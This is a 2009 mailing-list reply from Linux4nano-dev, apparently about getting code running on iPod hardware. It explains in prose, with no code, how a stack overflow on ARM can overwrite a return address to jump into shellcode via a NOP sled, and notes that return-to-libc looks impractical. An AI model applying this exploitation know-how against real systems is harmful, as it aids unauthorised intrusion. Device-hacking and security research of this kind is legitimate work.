2009/2/17, Bahattin TOZYILMAZ <[email protected]>: > Can we code addresses indirectly, create it on a register then use it? > It is easy on an x86 but, can it be done on an ARM?
Yes we can, but not to redirect the flow execution to the shellcode. > And another question, how will we trigger the shell code? If it is a stack based overflow and if the stack isn't marked as non exec, we write the shellcode address (more or less, but we have a small range of valid addresses (the NOPs)) on the stack, overwriting some return address of some function with it. (At least this is what I understand from the info given by The Seven in the previous email). In this way, after a LDR of PC from the stack, instead of the instruction after the function call we'll have our shellcode. Also, things like return-to-libc doesn't seem to be feasible on iPod... at least with a black box approach. But we should just try. _______________________________________________ Linux4nano-dev mailing list [email protected] https://mail.gna.org/listinfo/linux4nano-dev http://www.linux4nano.org
